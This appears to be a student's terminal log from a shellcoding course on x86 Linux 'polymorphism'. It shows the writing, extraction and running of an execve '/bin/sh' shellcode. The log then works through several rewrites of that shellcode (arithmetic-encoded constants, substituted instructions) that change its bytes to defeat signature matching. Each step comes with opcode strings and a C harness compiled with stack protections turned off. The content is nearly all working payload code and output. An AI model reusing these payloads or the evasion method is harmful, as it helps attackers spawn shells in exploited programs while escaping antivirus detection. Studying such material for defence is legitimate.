Polymorphism

1.) Assemble and run and modify code to achieve polymorphism
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly.nasm
kan1shka9@dev:~/Desktop/Remain/33$ ./compile_ld.sh poly
[+] Assebling with Nasm ...
[+] Linking ...
[+] Done!
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o
kan1shka9@dev:~/Desktop/Remain/33$ ./poly
$ ps
  PID TTY          TIME CMD
10169 pts/16   00:00:02 bash
11460 pts/16   00:00:00 sh
11461 pts/16   00:00:00 ps
$ exit
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d ./poly|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode.c
kan1shka9@dev:~/Desktop/Remain/33$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode.c
kan1shka9@dev:~/Desktop/Remain/33$ ./shellcode
Shellcode length: 25
$ ps
  PID TTY          TIME CMD
10169 pts/16   00:00:02 bash
11520 pts/16   00:00:00 sh
11521 pts/16   00:00:00 ps
$ exit
kan1shka9@dev:~/Desktop/Remain/33$ cat -n poly.nasm
     1  ; poly.nasm
     2
     3  global _start
     4
     5  section .text
     6  _start:
     7
     8          ; PUSH the first null dword
     9          xor eax, eax
    10          push eax
    11
    12          ; PUSH /bin//sh (8 bytes)
    13
    14          mov dword [esp-4], 0x68732f2f
    15          mov dword [esp-8], 0x6e69622f
    16          sub esp, 8
    17
    18          ; push 0x68732f2f
    19          ; push 0x6e69622f
    20
    21          mov ebx, esp
    22
    23          push eax
    24          mov edx, esp
    25
    26          push ebx
    27          mov ecx, esp
    28
    29          mov al, 11
    30          int 0x80
kan1shka9@dev:~/Desktop/Remain/33$ ./compile_ld.sh poly
[+] Assebling with Nasm ...
[+] Linking ...
[+] Done!
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode.c
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d poly -M intel

poly:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    eax,eax
 8048062:       50                      push   eax
 8048063:       c7 44 24 fc 2f 2f 73    mov    DWORD PTR [esp-0x4],0x68732f2f
 804806a:       68
 804806b:       c7 44 24 f8 2f 62 69    mov    DWORD PTR [esp-0x8],0x6e69622f
 8048072:       6e
 8048073:       83 ec 08                sub    esp,0x8
 8048076:       89 e3                   mov    ebx,esp
 8048078:       50                      push   eax
 8048079:       89 e2                   mov    edx,esp
 804807b:       53                      push   ebx
 804807c:       89 e1                   mov    ecx,esp
 804807e:       b0 0b                   mov    al,0xb
 8048080:       cd 80                   int    0x80
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d ./poly|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
kan1shka9@dev:~/Desktop/Remain/33$ nano shellcode.c
kan1shka9@dev:~/Desktop/Remain/33$ cat -n shellcode.c
     1  #include<stdio.h>
     2  #include<string.h>
     3
     4  unsigned char code[] = \
     5  "\x31\xc0\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
     6
     7  main()
     8  {
     9
    10      printf("Shellcode length: %d\n", strlen(code));
    11
    12      int (*ret)() = (int(*)())code;
    13
    14      ret();
    15
    16  }
kan1shka9@dev:~/Desktop/Remain/33$ mv shellcode.c shellcode-poly.c
kan1shka9@dev:~/Desktop/Remain/33$ gcc -fno-stack-protector -z execstack shellcode-poly.c -o shellcode-poly
kan1shka9@dev:~/Desktop/Remain/33$ ./shellcode-poly
Shellcode length: 34
$ ps
  PID TTY          TIME CMD
10169 pts/16   00:00:03 bash
11780 pts/16   00:00:00 sh
11781 pts/16   00:00:00 ps
$ exit
kan1shka9@dev:~/Desktop/Remain/33$
kan1shka9@dev:~/Desktop/Remain/33$ cat -n poly.nasm
     1  ; poly.nasm
     2
     3  global _start
     4
     5  section .text
     6  _start:
     7
     8          ; PUSH the first null dword
     9          xor eax, eax
    10          push eax
    11
    12
    13          ; mov dword [esp-4], 0x68732f2f
    14
    15          mov esi, 0x57621e1e
    16          add esi, 0x11111111
    17          mov dword [esp-4], esi
    18
    19          mov dword [esp-8], 0x6e69622f
    20          sub esp, 8
    21
    22          ; push 0x68732f2f
    23          ; push 0x6e69622f
    24
    25          mov ebx, esp
    26
    27          push eax
    28          mov edx, esp
    29
    30          push ebx
    31          mov ecx, esp
    32
    33          mov al, 11
    34          int 0x80
kan1shka9@dev:~/Desktop/Remain/33$ ./compile_ld.sh poly
[+] Assebling with Nasm ...
[+] Linking ...
[+] Done!
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d ./poly|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x89\x74\x24\xfc\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode-poly  shellcode-poly.c
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d poly -M intel

poly:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    eax,eax
 8048062:       50                      push   eax
 8048063:       be 1e 1e 62 57          mov    esi,0x57621e1e
 8048068:       81 c6 11 11 11 11       add    esi,0x11111111
 804806e:       89 74 24 fc             mov    DWORD PTR [esp-0x4],esi
 8048072:       c7 44 24 f8 2f 62 69    mov    DWORD PTR [esp-0x8],0x6e69622f
 8048079:       6e
 804807a:       83 ec 08                sub    esp,0x8
 804807d:       89 e3                   mov    ebx,esp
 804807f:       50                      push   eax
 8048080:       89 e2                   mov    edx,esp
 8048082:       53                      push   ebx
 8048083:       89 e1                   mov    ecx,esp
 8048085:       b0 0b                   mov    al,0xb
 8048087:       cd 80                   int    0x80
kan1shka9@dev:~/Desktop/Remain/33$ cp shellcode-poly.c shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode-poly  shellcode-poly.c  shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ nano shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ cat -n shellcode-poly_mod.c
     1  #include<stdio.h>
     2  #include<string.h>
     3
     4  unsigned char code[] = \
     5  "\x31\xc0\x50\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x89\x74\x24\xfc\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
     6
     7  main()
     8  {
     9
    10      printf("Shellcode length: %d\n", strlen(code));
    11
    12      int (*ret)() = (int(*)())code;
    13
    14      ret();
    15
    16  }
kan1shka9@dev:~/Desktop/Remain/33$ gcc -fno-stack-protector -z execstack shellcode-poly_mod.c -o shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode-poly  shellcode-poly.c  shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ ./shellcode-poly_mod.c
Shellcode length: 41
$ ps
  PID TTY          TIME CMD
10169 pts/16   00:00:03 bash
11898 pts/16   00:00:00 sh
11899 pts/16   00:00:00 ps
$ exit
kan1shka9@dev:~/Desktop/Remain/33$ nano poly.nasm
kan1shka9@dev:~/Desktop/Remain/33$ cat -n poly.nasm
     1  ; poly.nasm
     2
     3  global _start
     4
     5  section .text
     6  _start:
     7
     8          ; PUSH the first null dword
     9          ; xor eax, eax
    10          mov ebx, eax
    11          xor eax, ebx
    12
    13          ; push eax
    14          mov dword [esp-4], eax
    15          sub esp, 4
    16
    17          ; mov dword [esp-4], 0x68732f2f
    18          cld
    19          mov esi, 0x57621e1e
    20          add esi, 0x11111111
    21          mov dword [esp-4], esi
    22          std
    23
    24          mov dword [esp-8], 0x6e69622f
    25          sub esp, 8
    26
    27          ; push 0x68732f2f
    28          ; push 0x6e69622f
    29
    30          mov ebx, esp
    31
    32          push eax
    33          mov edx, esp
    34
    35          push ebx
    36          mov ecx, esp
    37
    38          mov al, 11
    39          int 0x80
kan1shka9@dev:~/Desktop/Remain/33$ ./compile_ld.sh poly
[+] Assebling with Nasm ...
[+] Linking ...
[+] Done!
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode-poly  shellcode-poly.c  shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d poly -M intel

poly:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       89 c3                   mov    ebx,eax
 8048062:       31 d8                   xor    eax,ebx
 8048064:       89 44 24 fc             mov    DWORD PTR [esp-0x4],eax
 8048068:       83 ec 04                sub    esp,0x4
 804806b:       fc                      cld
 804806c:       be 1e 1e 62 57          mov    esi,0x57621e1e
 8048071:       81 c6 11 11 11 11       add    esi,0x11111111
 8048077:       89 74 24 fc             mov    DWORD PTR [esp-0x4],esi
 804807b:       fd                      std
 804807c:       c7 44 24 f8 2f 62 69    mov    DWORD PTR [esp-0x8],0x6e69622f
 8048083:       6e
 8048084:       83 ec 08                sub    esp,0x8
 8048087:       89 e3                   mov    ebx,esp
 8048089:       50                      push   eax
 804808a:       89 e2                   mov    edx,esp
 804808c:       53                      push   ebx
 804808d:       89 e1                   mov    ecx,esp
 804808f:       b0 0b                   mov    al,0xb
 8048091:       cd 80                   int    0x80
kan1shka9@dev:~/Desktop/Remain/33$ objdump -d ./poly|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x89\xc3\x31\xd8\x89\x44\x24\xfc\x83\xec\x04\xfc\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x89\x74\x24\xfc\xfd\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
kan1shka9@dev:~/Desktop/Remain/33$ cat shellcode-poly_mod1.c -n
     1  #include<stdio.h>
     2  #include<string.h>
     3
     4  unsigned char code[] = \
     5  "\x89\xc3\x31\xd8\x89\x44\x24\xfc\x83\xec\x04\xfc\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x89\x74\x24\xfc\xfd\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
     6
     7  main()
     8  {
     9
    10      printf("Shellcode length: %d\n", strlen(code));
    11
    12      int (*ret)() = (int(*)())code;
    13
    14      ret();
    15
    16  }
kan1shka9@dev:~/Desktop/Remain/33$ gcc -fno-stack-protector -z execstack shellcode-poly_mod1.c -o shellcode-poly_mod1
kan1shka9@dev:~/Desktop/Remain/33$ ls
compile_ld.sh  poly  poly.nasm  poly.o  shellcode  shellcode-poly  shellcode-poly.c  shellcode-poly_mod1  shellcode-poly_mod1.c  shellcode-poly_mod.c
kan1shka9@dev:~/Desktop/Remain/33$ ./shellcode-poly_mod1
Shellcode length: 51
$ ps
  PID TTY          TIME CMD
10169 pts/16   00:00:04 bash
12065 pts/16   00:00:00 sh
12067 pts/16   00:00:00 ps
$ exit
kan1shka9@dev:~/Desktop/Remain/33$